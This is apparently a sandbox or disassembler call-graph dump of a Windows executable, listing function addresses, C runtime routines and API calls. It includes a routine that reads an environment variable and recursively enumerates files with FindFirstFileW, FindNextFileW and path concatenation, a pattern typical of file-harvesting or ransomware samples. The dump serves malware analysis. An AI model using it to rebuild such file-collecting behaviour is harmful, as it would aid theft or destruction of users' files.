1fc76368 _free 20 API calls 7239 1fc79a43 _abort 7236->7239 7256 1fc78c7b RtlEnterCriticalSection 7237->7256 7241 1fc76368 _free 20 API calls 7238->7241 7239->7202 7243 1fc79af9 7241->7243 7242 1fc79a89 7244 1fc79aa5 7242->7244 7245 1fc79aba 7242->7245 7246 1fc762ac ___std_exception_copy 26 API calls 7243->7246 7247 1fc76368 _free 20 API calls 7244->7247 7257 1fc79b0d 7245->7257 7246->7239 7249 1fc79aaa 7247->7249 7251 1fc76355 __dosmaperr 20 API calls 7249->7251 7250 1fc79ab5 7308 1fc79ae4 7250->7308 7251->7250 7254 1fc75b7a __dosmaperr 20 API calls 7253->7254 7255 1fc7635a 7254->7255 7255->7236 7256->7242 7258 1fc79b3b 7257->7258 7296 1fc79b34 7257->7296 7259 1fc79b3f 7258->7259 7260 1fc79b5e 7258->7260 7262 1fc76355 __dosmaperr 20 API calls 7259->7262 7263 1fc79b92 7260->7263 7264 1fc79baf 7260->7264 7261 1fc72ada _ValidateLocalCookies 5 API calls 7265 1fc79d15 7261->7265 7266 1fc79b44 7262->7266 7267 1fc76355 __dosmaperr 20 API calls 7263->7267 7268 1fc79bc5 7264->7268 7311 1fc7a00b 7264->7311 7265->7250 7269 1fc76368 _free 20 API calls 7266->7269 7271 1fc79b97 7267->7271 7314 1fc796b2 7268->7314 7273 1fc79b4b 7269->7273 7276 1fc76368 _free 20 API calls 7271->7276 7274 1fc762ac ___std_exception_copy 26 API calls 7273->7274 7274->7296 7279 1fc79b9f 7276->7279 7277 1fc79bd3 7280 1fc79bd7 7277->7280 7281 1fc79bf9 7277->7281 7278 1fc79c0c 7283 1fc79c66 WriteFile 7278->7283 7284 1fc79c20 7278->7284 7282 1fc762ac ___std_exception_copy 26 API calls 7279->7282 7285 1fc79ccd 7280->7285 7321 1fc79645 7280->7321 7326 1fc79492 GetConsoleCP 7281->7326 7282->7296 7287 1fc79c89 GetLastError 7283->7287 7294 1fc79bef 7283->7294 7288 1fc79c56 7284->7288 7289 1fc79c28 7284->7289 7285->7296 7297 1fc76368 _free 20 API calls 7285->7297 7287->7294 7352 1fc79728 7288->7352 7290 1fc79c46 7289->7290 7291 1fc79c2d 7289->7291 7344 1fc798f5 7290->7344 7291->7285 7337 1fc79807 7291->7337 7294->7285 7294->7296 7300 1fc79ca9 7294->7300 7296->7261 7299 1fc79cf2 7297->7299 7303 1fc76355 __dosmaperr 20 API calls 7299->7303 7301 1fc79cc4 7300->7301 7302 1fc79cb0 7300->7302 7359 1fc76332 7301->7359 7304 1fc76368 _free 20 API calls 7302->7304 7303->7296 7306 1fc79cb5 7304->7306 7307 1fc76355 __dosmaperr 20 API calls 7306->7307 7307->7296 7400 1fc78c9e RtlLeaveCriticalSection 7308->7400 7310 1fc79aea 7310->7239 7364 1fc79f8d 7311->7364 7386 1fc78dbc 7314->7386 7316 1fc796c7 7316->7277 7316->7278 7317 1fc796c2 7317->7316 7318 1fc75af6 _abort 38 API calls 7317->7318 7319 1fc796ea 7318->7319 7319->7316 7320 1fc79708 GetConsoleMode 7319->7320 7320->7316 7324 1fc7969f 7321->7324 7325 1fc7966a 7321->7325 7322 1fc796a1 GetLastError 7322->7324 7323 1fc7a181 WriteConsoleW CreateFileW 7323->7325 7324->7294 7325->7322 7325->7323 7325->7324 7331 1fc79607 7326->7331 7335 1fc794f5 7326->7335 7327 1fc72ada _ValidateLocalCookies 5 API calls 7329 1fc79641 7327->7329 7329->7294 7330 1fc779e6 40 API calls __fassign 7330->7335 7331->7327 7332 1fc7957b WideCharToMultiByte 7332->7331 7333 1fc795a1 WriteFile 7332->7333 7334 1fc7962a GetLastError 7333->7334 7333->7335 7334->7331 7335->7330 7335->7331 7335->7332 7336 1fc795d2 WriteFile 7335->7336 7395 1fc77c19 7335->7395 7336->7334 7336->7335 7341 1fc79816 7337->7341 7338 1fc798d8 7340 1fc72ada _ValidateLocalCookies 5 API calls 7338->7340 7339 1fc79894 WriteFile 7339->7341 7342 1fc798da GetLastError 7339->7342 7343 1fc798f1 7340->7343 7341->7338 7341->7339 7342->7338 7343->7294 7349 1fc79904 7344->7349 7345 1fc79a0f 7346 1fc72ada _ValidateLocalCookies 5 API calls 7345->7346 7348 1fc79a1e 7346->7348 7347 1fc79986 WideCharToMultiByte 7350 1fc79a07 GetLastError 7347->7350 7351 1fc799bb WriteFile 7347->7351 7348->7294 7349->7345 7349->7347 7349->7351 7350->7345 7351->7349 7351->7350 7357 1fc79737 7352->7357 7353 1fc797ea 7355 1fc72ada _ValidateLocalCookies 5 API calls 7353->7355 7354 1fc797a9 WriteFile 7354->7357 7358 1fc797ec GetLastError 7354->7358 7356 1fc79803 7355->7356 7356->7294 7357->7353 7357->7354 7358->7353 7360 1fc76355 __dosmaperr 20 API calls 7359->7360 7361 1fc7633d _free 7360->7361 7362 1fc76368 _free 20 API calls 7361->7362 7363 1fc76350 7362->7363 7363->7296 7373 1fc78d52 7364->7373 7366 1fc79f9f 7367 1fc79fa7 7366->7367 7368 1fc79fb8 SetFilePointerEx 7366->7368 7369 1fc76368 _free 20 API calls 7367->7369 7370 1fc79fd0 GetLastError 7368->7370 7371 1fc79fac 7368->7371 7369->7371 7372 1fc76332 __dosmaperr 20 API calls 7370->7372 7371->7268 7372->7371 7374 1fc78d5f 7373->7374 7377 1fc78d74 7373->7377 7375 1fc76355 __dosmaperr 20 API calls 7374->7375 7376 1fc78d64 7375->7376 7379 1fc76368 _free 20 API calls 7376->7379 7378 1fc76355 __dosmaperr 20 API calls 7377->7378 7380 1fc78d99 7377->7380 7381 1fc78da4 7378->7381 7382 1fc78d6c 7379->7382 7380->7366 7383 1fc76368 _free 20 API calls 7381->7383 7382->7366 7384 1fc78dac 7383->7384 7385 1fc762ac ___std_exception_copy 26 API calls 7384->7385 7385->7382 7387 1fc78dd6 7386->7387 7388 1fc78dc9 7386->7388 7391 1fc78de2 7387->7391 7392 1fc76368 _free 20 API calls 7387->7392 7389 1fc76368 _free 20 API calls 7388->7389 7390 1fc78dce 7389->7390 7390->7317 7391->7317 7393 1fc78e03 7392->7393 7394 1fc762ac ___std_exception_copy 26 API calls 7393->7394 7394->7390 7396 1fc75af6 _abort 38 API calls 7395->7396 7397 1fc77c24 7396->7397 7398 1fc77a00 __fassign 38 API calls 7397->7398 7399 1fc77c34 7398->7399 7399->7335 7400->7310 7404 1fc7ad24 7401->7404 7403 1fc7adca 7403->7225 7405 1fc7ad30 ___DestructExceptionObject 7404->7405 7415 1fc78c7b RtlEnterCriticalSection 7405->7415 7407 1fc7ad3e 7408 1fc7ad65 7407->7408 7409 1fc7ad70 7407->7409 7416 1fc7ae4d 7408->7416 7411 1fc76368 _free 20 API calls 7409->7411 7412 1fc7ad6b 7411->7412 7431 1fc7ad9a 7412->7431 7414 1fc7ad8d _abort 7414->7403 7415->7407 7417 1fc78d52 26 API calls 7416->7417 7420 1fc7ae5d 7417->7420 7418 1fc7ae63 7434 1fc78cc1 7418->7434 7420->7418 7423 1fc78d52 26 API calls 7420->7423 7430 1fc7ae95 7420->7430 7421 1fc78d52 26 API calls 7424 1fc7aea1 CloseHandle 7421->7424 7425 1fc7ae8c 7423->7425 7424->7418 7426 1fc7aead GetLastError 7424->7426 7428 1fc78d52 26 API calls 7425->7428 7426->7418 7427 1fc76332 __dosmaperr 20 API calls 7429 1fc7aedd 7427->7429 7428->7430 7429->7412 7430->7418 7430->7421 7443 1fc78c9e RtlLeaveCriticalSection 7431->7443 7433 1fc7ada4 7433->7414 7435 1fc78d37 7434->7435 7436 1fc78cd0 7434->7436 7437 1fc76368 _free 20 API calls 7435->7437 7436->7435 7442 1fc78cfa 7436->7442 7438 1fc78d3c 7437->7438 7439 1fc76355 __dosmaperr 20 API calls 7438->7439 7440 1fc78d27 7439->7440 7440->7427 7440->7429 7441 1fc78d21 SetStdHandle 7441->7440 7442->7440 7442->7441 7443->7433 7444->7199 7445->7179 7633 1fc74ed7 7634 1fc76d60 51 API calls 7633->7634 7635 1fc74ee9 7634->7635 7644 1fc77153 GetEnvironmentStringsW 7635->7644 7638 1fc74ef4 7640 1fc7571e _free 20 API calls 7638->7640 7641 1fc74f29 7640->7641 7642 1fc7571e _free 20 API calls 7642->7638 7643 1fc74eff 7643->7642 7645 1fc7716a 7644->7645 7655 1fc771bd 7644->7655 7646 1fc77170 WideCharToMultiByte 7645->7646 7649 1fc7718c 7646->7649 7646->7655 7647 1fc771c6 FreeEnvironmentStringsW 7648 1fc74eee 7647->7648 7648->7638 7656 1fc74f2f 7648->7656 7650 1fc756d0 21 API calls 7649->7650 7651 1fc77192 7650->7651 7652 1fc771af 7651->7652 7653 1fc77199 WideCharToMultiByte 7651->7653 7654 1fc7571e _free 20 API calls 7652->7654 7653->7652 7654->7655 7655->7647 7655->7648 7657 1fc74f44 7656->7657 7658 1fc7637b __dosmaperr 20 API calls 7657->7658 7668 1fc74f6b 7658->7668 7659 1fc74fcf 7660 1fc7571e _free 20 API calls 7659->7660 7661 1fc74fe9 7660->7661 7661->7643 7662 1fc7637b __dosmaperr 20 API calls 7662->7668 7663 1fc74fd1 7665 1fc75000 20 API calls 7663->7665 7666 1fc74fd7 7665->7666 7669 1fc7571e _free 20 API calls 7666->7669 7667 1fc74ff3 7670 1fc762bc ___std_exception_copy 11 API calls 7667->7670 7668->7659 7668->7662 7668->7663 7668->7667 7671 1fc7571e _free 20 API calls 7668->7671 7673 1fc7544d 7668->7673 7669->7659 7672 1fc74fff 7670->7672 7671->7668 7674 1fc75468 7673->7674 7675 1fc7545a 7673->7675 7676 1fc76368 _free 20 API calls 7674->7676 7675->7674 7680 1fc7547f 7675->7680 7677 1fc75470 7676->7677 7678 1fc762ac ___std_exception_copy 26 API calls 7677->7678 7679 1fc7547a 7678->7679 7679->7668 7680->7679 7681 1fc76368 _free 20 API calls 7680->7681 7681->7677 6393 1fc773d5 6394 1fc773e1 ___DestructExceptionObject 6393->6394 6405 1fc75671 RtlEnterCriticalSection 6394->6405 6396 1fc773e8 6406 1fc78be3 6396->6406 6398 1fc773f7 6404 1fc77406 6398->6404 6419 1fc77269 GetStartupInfoW 6398->6419 6402 1fc77417 _abort 6430 1fc77422 6404->6430 6405->6396 6407 1fc78bef ___DestructExceptionObject 6406->6407 6408 1fc78c13 6407->6408 6409 1fc78bfc 6407->6409 6436 1fc75671 RtlEnterCriticalSection 6408->6436 6411 1fc76368 _free 20 API calls 6409->6411 6412 1fc78c01 6411->6412 6433 1fc762ac 6412->6433 6414 1fc78c0b _abort 6414->6398 6415 1fc78c4b 6444 1fc78c72 6415->6444 6416 1fc78c1f 6416->6415 6437 1fc78b34 6416->6437 6420 1fc77286 6419->6420 6422 1fc77318 6419->6422 6421 1fc78be3 27 API calls 6420->6421 6420->6422 6423 1fc772af 6421->6423 6425 1fc7731f 6422->6425 6423->6422 6424 1fc772dd GetFileType 6423->6424 6424->6423 6426 1fc77326 6425->6426 6427 1fc77369 GetStdHandle 6426->6427 6428 1fc773d1 6426->6428 6429 1fc7737c GetFileType 6426->6429 6427->6426 6428->6404 6429->6426 6476 1fc756b9 RtlLeaveCriticalSection 6430->6476 6432 1fc77429 6432->6402 6447 1fc76231 6433->6447 6435 1fc762b8 6435->6414 6436->6416 6438 1fc7637b __dosmaperr 20 API calls 6437->6438 6439 1fc78b46 6438->6439 6443 1fc78b53 6439->6443 6468 1fc75eb7 6439->6468 6440 1fc7571e _free 20 API calls 6442 1fc78ba5 6440->6442 6442->6416 6443->6440 6475 1fc756b9 RtlLeaveCriticalSection 6444->6475 6446 1fc78c79 6446->6414 6448 1fc75b7a __dosmaperr 20 API calls 6447->6448 6449 1fc76247 6448->6449 6450 1fc762a6 6449->6450 6451 1fc76255 6449->6451 6458 1fc762bc IsProcessorFeaturePresent 6450->6458 6455 1fc72ada _ValidateLocalCookies 5 API calls 6451->6455 6453 1fc762ab 6454 1fc76231 ___std_exception_copy 26 API calls 6453->6454 6456 1fc762b8 6454->6456 6457 1fc7627c 6455->6457 6456->6435 6457->6435 6459 1fc762c7 6458->6459 6462 1fc760e2 6459->6462 6463 1fc760fe ___scrt_fastfail 6462->6463 6464 1fc7612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6463->6464 6465 1fc761fb ___scrt_fastfail 6464->6465 6466 1fc72ada _ValidateLocalCookies 5 API calls 6465->6466 6467 1fc76219 GetCurrentProcess TerminateProcess 6466->6467 6467->6453 6469 1fc75c45 __dosmaperr 5 API calls 6468->6469 6470 1fc75ede 6469->6470 6471 1fc75efc InitializeCriticalSectionAndSpinCount 6470->6471 6472 1fc75ee7 6470->6472 6471->6472 6473 1fc72ada _ValidateLocalCookies 5 API calls 6472->6473 6474 1fc75f13 6473->6474 6474->6439 6475->6446 6476->6432 7682 1fc766d5 7683 1fc766e1 7682->7683 7684 1fc766f2 7683->7684 7685 1fc766eb FindClose 7683->7685 7686 1fc72ada _ValidateLocalCookies 5 API calls 7684->7686 7685->7684 7687 1fc76701 7686->7687 7446 1fc75351 7447 1fc75360 7446->7447 7448 1fc75374 7446->7448 7447->7448 7450 1fc7571e _free 20 API calls 7447->7450 7449 1fc7571e _free 20 API calls 7448->7449 7451 1fc75386 7449->7451 7450->7448 7452 1fc7571e _free 20 API calls 7451->7452 7453 1fc75399 7452->7453 7454 1fc7571e _free 20 API calls 7453->7454 7455 1fc753aa 7454->7455 7456 1fc7571e _free 20 API calls 7455->7456 7457 1fc753bb 7456->7457 7688 1fc736d0 7689 1fc736f0 @_EH4_CallFilterFunc@8 7688->7689 7690 1fc736e2 7688->7690 7691 1fc72ada _ValidateLocalCookies 5 API calls 7690->7691 7691->7689 6477 1fc74bdd 6478 1fc74bec 6477->6478 6479 1fc74c08 6477->6479 6478->6479 6481 1fc74bf2 6478->6481 6500 1fc76d60 6479->6500 6483 1fc76368 _free 20 API calls 6481->6483 6485 1fc74bf7 6483->6485 6484 1fc74c33 6504 1fc74d01 6484->6504 6486 1fc762ac ___std_exception_copy 26 API calls 6485->6486 6488 1fc74c01 6486->6488 6492 1fc74c66 6494 1fc76368 _free 20 API calls 6492->6494 6493 1fc74c72 6495 1fc74d01 38 API calls 6493->6495 6499 1fc74c6b 6494->6499 6496 1fc74c88 6495->6496 6498 1fc7571e _free 20 API calls 6496->6498 6496->6499 6497 1fc7571e _free 20 API calls 6497->6488 6498->6499 6499->6497 6501 1fc74c0f GetModuleFileNameA 6500->6501 6502 1fc76d69 6500->6502 6501->6484 6516 1fc76c5f 6502->6516 6506 1fc74d26 6504->6506 6508 1fc74d86 6506->6508 6888 1fc770eb 6506->6888 6507 1fc74c50 6510 1fc74e76 6507->6510 6508->6507 6509 1fc770eb 38 API calls 6508->6509 6509->6508 6511 1fc74e8b 6510->6511 6512 1fc74c5d 6510->6512 6511->6512 6513 1fc7637b __dosmaperr 20 API calls 6511->6513 6512->6492 6512->6493 6514 1fc74eb9 6513->6514 6515 1fc7571e _free 20 API calls 6514->6515 6515->6512 6536 1fc75af6 GetLastError 6516->6536 6518 1fc76c6c 6556 1fc76d7e 6518->6556 6520 1fc76c74 6565 1fc769f3 6520->6565 6523 1fc76c8b 6523->6501 6528 1fc7571e _free 20 API calls 6528->6523 6529 1fc76cc9 6530 1fc76368 _free 20 API calls 6529->6530 6532 1fc76cce 6530->6532 6531 1fc76d12 6531->6532 6589 1fc768c9 6531->6589 6532->6528 6533 1fc76ce6 6533->6531 6534 1fc7571e _free 20 API calls 6533->6534 6534->6531 6537 1fc75b0c 6536->6537 6538 1fc75b12 6536->6538 6539 1fc75e08 __dosmaperr 11 API calls 6537->6539 6540 1fc7637b __dosmaperr 20 API calls 6538->6540 6543 1fc75b61 SetLastError 6538->6543 6539->6538 6541 1fc75b24 6540->6541 6542 1fc75b2c 6541->6542 6544 1fc75e5e __dosmaperr 11 API calls 6541->6544 6545 1fc7571e _free 20 API calls 6542->6545 6543->6518 6546 1fc75b41 6544->6546 6547 1fc75b32 6545->6547 6546->6542 6548 1fc75b48 6546->6548 6549 1fc75b6d SetLastError 6547->6549 6550 1fc7593c __dosmaperr 20 API calls 6548->6550 6592 1fc755a8 6549->6592 6552 1fc75b53 6550->6552 6554 1fc7571e _free 20 API calls 6552->6554 6555 1fc75b5a 6554->6555 6555->6543 6555->6549 6557 1fc76d8a ___DestructExceptionObject 6556->6557 6558 1fc75af6 _abort 38 API calls 6557->6558 6563 1fc76d94 6558->6563 6560 1fc76e18 _abort 6560->6520 6561 1fc755a8 _abort 38 API calls 6561->6563 6563->6560 6563->6561 6564 1fc7571e _free 20 API calls 6563->6564 6741 1fc75671 RtlEnterCriticalSection 6563->6741 6742 1fc76e0f 6563->6742 6564->6563 6746 1fc754a7 6565->6746 6568 1fc76a26 6570 1fc76a3d 6568->6570 6571 1fc76a2b GetACP 6568->6571 6569 1fc76a14 GetOEMCP 6569->6570 6570->6523 6572 1fc756d0 6570->6572 6571->6570 6573 1fc7570e 6572->6573 6574 1fc756de __dosmaperr 6572->6574 6575 1fc76368 _free 20 API calls 6573->6575 6574->6573 6576 1fc756f9 RtlAllocateHeap 6574->6576 6578 1fc7474f __dosmaperr 7 API calls 6574->6578 6577 1fc7570c 6575->6577 6576->6574 6576->6577 6577->6532 6579 1fc76e20 6577->6579 6578->6574 6580 1fc769f3 40 API calls 6579->6580 6581 1fc76e3f 6580->6581 6584 1fc76e90 IsValidCodePage 6581->6584 6586 1fc76e46 6581->6586 6588 1fc76eb5 ___scrt_fastfail 6581->6588 6582 1fc72ada _ValidateLocalCookies 5 API calls 6583 1fc76cc1 6582->6583 6583->6529 6583->6533 6585 1fc76ea2 GetCPInfo 6584->6585 6584->6586 6585->6586 6585->6588 6586->6582 6779 1fc76acb GetCPInfo 6588->6779 6852 1fc76886 6589->6852 6591 1fc768ed 6591->6532 6603 1fc77613 6592->6603 6595 1fc755b8 6597 1fc755e0 6595->6597 6598 1fc755c2 IsProcessorFeaturePresent 6595->6598 6633 1fc74bc1 6597->6633 6599 1fc755cd 6598->6599 6601 1fc760e2 _abort 8 API calls 6599->6601 6601->6597 6636 1fc77581 6603->6636 6606 1fc7766e 6607 1fc7767a _abort 6606->6607 6608 1fc75b7a __dosmaperr 20 API calls 6607->6608 6609 1fc776a7 _abort 6607->6609 6614 1fc776a1 _abort 6607->6614 6608->6614 6621 1fc7771f 6609->6621 6650 1fc75671 RtlEnterCriticalSection 6609->6650 6610 1fc776f3 6611 1fc76368 _free 20 API calls 6610->6611 6612 1fc776f8 6611->6612 6615 1fc762ac ___std_exception_copy 26 API calls 6612->6615 6614->6609 6614->6610 6625 1fc776d6 6614->6625 6615->6625 6618 1fc7777e 6630 1fc777a9 6618->6630 6652 1fc77665 6618->6652 6620 1fc77776 6624 1fc74bc1 _abort 28 API calls 6620->6624 6621->6618 6621->6620 6621->6630 6651 1fc756b9 RtlLeaveCriticalSection 6621->6651 6624->6618 6659 1fc7bdc9 6625->6659 6627 1fc75af6 _abort 38 API calls 6631 1fc7780c 6627->6631 6629 1fc77665 _abort 38 API calls 6629->6630 6655 1fc7782e 6630->6655 6631->6625 6632 1fc75af6 _abort 38 API calls 6631->6632 6632->6625 6663 1fc7499b 6633->6663 6639 1fc77527 6636->6639 6638 1fc755ad 6638->6595 6638->6606 6640 1fc77533 ___DestructExceptionObject 6639->6640 6645 1fc75671 RtlEnterCriticalSection 6640->6645 6642 1fc77541 6646 1fc77575 6642->6646 6644 1fc77568 _abort 6644->6638 6645->6642 6649 1fc756b9 RtlLeaveCriticalSection 6646->6649 6648 1fc7757f 6648->6644 6649->6648 6650->6621 6651->6620 6653 1fc75af6 _abort 38 API calls 6652->6653 6654 1fc7766a 6653->6654 6654->6629 6656 1fc77834 6655->6656 6657 1fc777fd 6655->6657 6662 1fc756b9 RtlLeaveCriticalSection 6656->6662 6657->6625 6657->6627 6657->6631 6660 1fc72ada _ValidateLocalCookies 5 API calls 6659->6660 6661 1fc7bdd4 6660->6661 6661->6661 6662->6657 6664 1fc749a7 _abort 6663->6664 6673 1fc749bf 6664->6673 6685 1fc74af5 GetModuleHandleW 6664->6685 6671 1fc749c7 6672 1fc74a3c 6671->6672 6682 1fc74a65 6671->6682 6695 1fc7527a 6671->6695 6676 1fc74a54 6672->6676 6698 1fc74669 6672->6698 6694 1fc75671 RtlEnterCriticalSection 6673->6694 6674 1fc74a82 6705 1fc74ab4 6674->6705 6675 1fc74aae 6680 1fc7bdc9 _abort 5 API calls 6675->6680 6677 1fc74669 _abort 5 API calls 6676->6677 6677->6682 6684 1fc74ab3 6680->6684 6702 1fc74aa5 6682->6702 6686 1fc749b3 6685->6686 6686->6673 6687 1fc74b39 GetModuleHandleExW 6686->6687 6688 1fc74b63 GetProcAddress 6687->6688 6691 1fc74b78 6687->6691 6688->6691 6689 1fc74b95 6692 1fc72ada _ValidateLocalCookies 5 API calls 6689->6692 6690 1fc74b8c FreeLibrary 6690->6689 6691->6689 6691->6690 6693 1fc74b9f 6692->6693 6693->6673 6694->6671 6713 1fc75132 6695->6713 6699 1fc74698 6698->6699 6700 1fc72ada _ValidateLocalCookies 5 API calls 6699->6700 6701 1fc746c1 6700->6701 6701->6676 6734 1fc756b9 RtlLeaveCriticalSection 6702->6734 6704 1fc74a7e 6704->6674 6704->6675 6735 1fc76025 6705->6735 6708 1fc74ae2 6711 1fc74b39 _abort 8 API calls 6708->6711 6709 1fc74ac2 GetPEB 6709->6708 6710 1fc74ad2 GetCurrentProcess TerminateProcess 6709->6710 6710->6708 6712 1fc74aea ExitProcess 6711->6712 6716 1fc750e1 6713->6716 6715 1fc75156 6715->6672 6717 1fc750ed ___DestructExceptionObject 6716->6717 6724 1fc75671 RtlEnterCriticalSection 6717->6724 6719 1fc750fb 6725 1fc7515a 6719->6725 6723 1fc75119 _abort 6723->6715 6724->6719 6728 1fc75182 6725->6728 6729 1fc7517a 6725->6729 6726 1fc72ada _ValidateLocalCookies 5 API calls 6727 1fc75108 6726->6727 6731 1fc75126 6727->6731 6728->6729 6730 1fc7571e _free 20 API calls 6728->6730 6729->6726 6730->6729 6732 1fc756b9 _abort RtlLeaveCriticalSection 6731->6732 6733 1fc75130 6732->6733 6733->6723 6734->6704 6736 1fc7604a 6735->6736 6740 1fc76040 6735->6740 6737 1fc75c45 __dosmaperr 5 API calls 6736->6737 6737->6740 6738 1fc72ada _ValidateLocalCookies 5 API calls 6739 1fc74abe 6738->6739 6739->6708 6739->6709 6740->6738 6741->6563 6745 1fc756b9 RtlLeaveCriticalSection 6742->6745 6744 1fc76e16 6744->6563 6745->6744 6747 1fc754c4 6746->6747 6753 1fc754ba 6746->6753 6748 1fc75af6 _abort 38 API calls 6747->6748 6747->6753 6749 1fc754e5 6748->6749 6754 1fc77a00 6749->6754 6753->6568 6753->6569 6755 1fc77a13 6754->6755 6756 1fc754fe 6754->6756 6755->6756 6762 1fc77f0f 6755->6762 6758 1fc77a2d 6756->6758 6759 1fc77a55 6758->6759 6760 1fc77a40 6758->6760 6759->6753 6760->6759 6761 1fc76d7e __fassign 38 API calls 6760->6761 6761->6759 6763 1fc77f1b ___DestructExceptionObject 6762->6763 6764 1fc75af6 _abort 38 API calls 6763->6764 6765 1fc77f24 6764->6765 6766 1fc77f72 _abort 6765->6766 6774 1fc75671 RtlEnterCriticalSection 6765->6774 6766->6756 6768 1fc77f42 6769 1fc77f86 __fassign 20 API calls 6768->6769 6770 1fc77f56 6769->6770 6775 1fc77f75 6770->6775 6773 1fc755a8 _abort 38 API calls 6773->6766 6774->6768 6778 1fc756b9 RtlLeaveCriticalSection 6775->6778 6777 1fc77f69 6777->6766 6777->6773 6778->6777 6780 1fc76baf 6779->6780 6781 1fc76b05 6779->6781 6784 1fc72ada _ValidateLocalCookies 5 API calls 6780->6784 6789 1fc786e4 6781->6789 6786 1fc76c5b 6784->6786 6786->6586 6788 1fc78a3e 43 API calls 6788->6780 6790 1fc754a7 __fassign 38 API calls 6789->6790 6791 1fc78704 MultiByteToWideChar 6790->6791 6793 1fc787da 6791->6793 6794 1fc78742 6791->6794 6795 1fc72ada _ValidateLocalCookies 5 API calls 6793->6795 6796 1fc78763 ___scrt_fastfail 6794->6796 6798 1fc756d0 21 API calls 6794->6798 6799 1fc76b66 6795->6799 6797 1fc787d4 6796->6797 6801 1fc787a8 MultiByteToWideChar 6796->6801 6808 1fc78801 6797->6808 6798->6796 6803 1fc78a3e 6799->6803 6801->6797 6802 1fc787c4 GetStringTypeW 6801->6802 6802->6797 6804 1fc754a7 __fassign 38 API calls 6803->6804 6805 1fc78a51 6804->6805 6812 1fc78821 6805->6812 6809 1fc7881e 6808->6809 6810 1fc7880d 6808->6810 6809->6793 6810->6809 6811 1fc7571e _free 20 API calls 6810->6811 6811->6809 6813 1fc7883c 6812->6813 6814 1fc78862 MultiByteToWideChar 6813->6814 6815 1fc7888c 6814->6815 6816 1fc78a16 6814->6816 6819 1fc756d0 21 API calls 6815->6819 6822 1fc788ad 6815->6822 6817 1fc72ada _ValidateLocalCookies 5 API calls 6816->6817 6818 1fc76b87 6817->6818 6818->6788 6819->6822 6820 1fc788f6 MultiByteToWideChar 6821 1fc78962 6820->6821 6823 1fc7890f 6820->6823 6824 1fc78801 __freea 20 API calls 6821->6824 6822->6820 6822->6821 6839 1fc75f19 6823->6839 6824->6816 6827 1fc78971 6831 1fc756d0 21 API calls 6827->6831 6832 1fc78992 6827->6832 6828 1fc78939 6828->6821 6829 1fc75f19 11 API calls 6828->6829 6829->6821 6830 1fc78a07 6834 1fc78801 __freea 20 API calls 6830->6834 6831->6832 6832->6830 6833 1fc75f19 11 API calls 6832->6833 6835 1fc789e6 6833->6835 6834->6821 6835->6830 6836 1fc789f5 WideCharToMultiByte 6835->6836 6836->6830 6837 1fc78a35 6836->6837 6838 1fc78801 __freea 20 API calls 6837->6838 6838->6821 6840 1fc75c45 __dosmaperr 5 API calls 6839->6840 6841 1fc75f40 6840->6841 6844 1fc75f49 6841->6844 6847 1fc75fa1 6841->6847 6845 1fc72ada _ValidateLocalCookies 5 API calls 6844->6845 6846 1fc75f9b 6845->6846 6846->6821 6846->6827 6846->6828 6848 1fc75c45 __dosmaperr 5 API calls 6847->6848 6849 1fc75fc8 6848->6849 6850 1fc72ada _ValidateLocalCookies 5 API calls 6849->6850 6851 1fc75f89 LCMapStringW 6850->6851 6851->6844 6853 1fc76892 ___DestructExceptionObject 6852->6853 6860 1fc75671 RtlEnterCriticalSection 6853->6860 6855 1fc7689c 6861 1fc768f1 6855->6861 6859 1fc768b5 _abort 6859->6591 6860->6855 6873 1fc77011 6861->6873 6863 1fc7693f 6864 1fc77011 26 API calls 6863->6864 6865 1fc7695b 6864->6865 6866 1fc77011 26 API calls 6865->6866 6867 1fc76979 6866->6867 6868 1fc7571e _free 20 API calls 6867->6868 6869 1fc768a9 6867->6869 6868->6869 6870 1fc768bd 6869->6870 6887 1fc756b9 RtlLeaveCriticalSection 6870->6887 6872 1fc768c7 6872->6859 6874 1fc77022 6873->6874 6881 1fc7701e 6873->6881 6875 1fc77029 6874->6875 6879 1fc7703c ___scrt_fastfail 6874->6879 6876 1fc76368 _free 20 API calls 6875->6876 6877 1fc7702e 6876->6877 6878 1fc762ac ___std_exception_copy 26 API calls 6877->6878 6878->6881 6880 1fc7706a 6879->6880 6879->6881 6883 1fc77073 6879->6883 6882 1fc76368 _free 20 API calls 6880->6882 6881->6863 6884 1fc7706f 6882->6884 6883->6881 6885 1fc76368 _free 20 API calls 6883->6885 6886 1fc762ac ___std_exception_copy 26 API calls 6884->6886 6885->6884 6886->6881 6887->6872 6891 1fc77092 6888->6891 6892 1fc754a7 __fassign 38 API calls 6891->6892 6893 1fc770a6 6892->6893 6893->6506 6035 1fc71c5b 6036 1fc71c6b ___scrt_fastfail 6035->6036 6039 1fc712ee 6036->6039 6038 1fc71c87 6040 1fc71324 ___scrt_fastfail 6039->6040 6041 1fc713b7 GetEnvironmentVariableW 6040->6041 6065 1fc710f1 6041->6065 6044 1fc710f1 57 API calls 6045 1fc71465 6044->6045 6046 1fc710f1 57 API calls 6045->6046 6047 1fc71479 6046->6047 6048 1fc710f1 57 API calls 6047->6048 6049 1fc7148d 6048->6049 6050 1fc710f1 57 API calls 6049->6050 6051 1fc714a1 6050->6051 6052 1fc710f1 57 API calls 6051->6052 6053 1fc714b5 lstrlenW 6052->6053 6054 1fc714d2 6053->6054 6055 1fc714d9 lstrlenW 6053->6055 6054->6038 6056 1fc710f1 57 API calls 6055->6056 6057 1fc71501 lstrlenW lstrcatW 6056->6057 6058 1fc710f1 57 API calls 6057->6058 6059 1fc71539 lstrlenW lstrcatW 6058->6059 6060 1fc710f1 57 API calls 6059->6060 6061 1fc7156b lstrlenW lstrcatW 6060->6061 6062 1fc710f1 57 API calls 6061->6062 6063 1fc7159d lstrlenW lstrcatW 6062->6063 6064 1fc710f1 57 API calls 6063->6064 6064->6054 6066 1fc71118 ___scrt_fastfail 6065->6066 6067 1fc71129 lstrlenW 6066->6067 6078 1fc72c40 6067->6078 6070 1fc71177 lstrlenW FindFirstFileW 6072 1fc711e1 6070->6072 6073 1fc711a0 6070->6073 6071 1fc71168 lstrlenW 6071->6070 6072->6044 6074 1fc711c7 FindNextFileW 6073->6074 6075 1fc711aa 6073->6075 6074->6073 6077 1fc711da FindClose 6074->6077 6075->6074 6080 1fc71000 6075->6080 6077->6072 6079 1fc71148 lstrcatW lstrlenW 6078->6079 6079->6070 6079->6071 6081 1fc71022 ___scrt_fastfail 6080->6081 6082 1fc710af 6081->6082 6083 1fc7102f lstrcatW lstrlenW 6081->6083 6086 1fc710b5 lstrlenW 6082->6086 6096 1fc710ad 6082->6096 6084 1fc7106b lstrlenW 6083->6084 6085 1fc7105a lstrlenW 6083->6085 6097 1fc71e89 lstrlenW 